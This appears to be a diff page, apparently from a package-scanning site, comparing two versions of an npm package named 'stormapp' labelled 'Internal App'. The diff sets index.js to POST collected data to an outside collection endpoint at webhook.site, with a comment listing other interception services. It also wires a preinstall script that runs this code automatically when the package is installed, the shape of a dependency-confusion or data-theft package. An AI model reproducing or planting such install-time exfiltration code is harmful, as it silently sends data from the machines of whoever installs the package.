stormapp 1.0.2 → 1.0.4
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +2 -2
package/index.js
CHANGED
@@ -22,7 +22,7 @@ var postData = querystring.stringify({
|
|
22
22
|
});
|
23
23
|
|
24
24
|
var options = {
|
25
|
-
hostname: "
|
25
|
+
hostname: "webhook.site", //replace burpcollaborator.net with Interactsh or pipedream
|
26
26
|
port: 443,
|
27
27
|
path: "/b92739e0-efb0-46af-9683-dd859bd1b348",
|
28
28
|
method: "POST",
|
package/package.json
CHANGED
@@ -1,11 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "stormapp",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.4",
|
4
4
|
"description": "Internal App",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "echo \\\"Error: no test specified\\\" && exit 1",
|
8
|
-
"preinstall": "node index.js"
|
8
|
+
"preinstall": "node node_modules/stormapp/index.js"
|
9
9
|
},
|
10
10
|
"author": "Internal App",
|
11
11
|
"license": "ISC"
|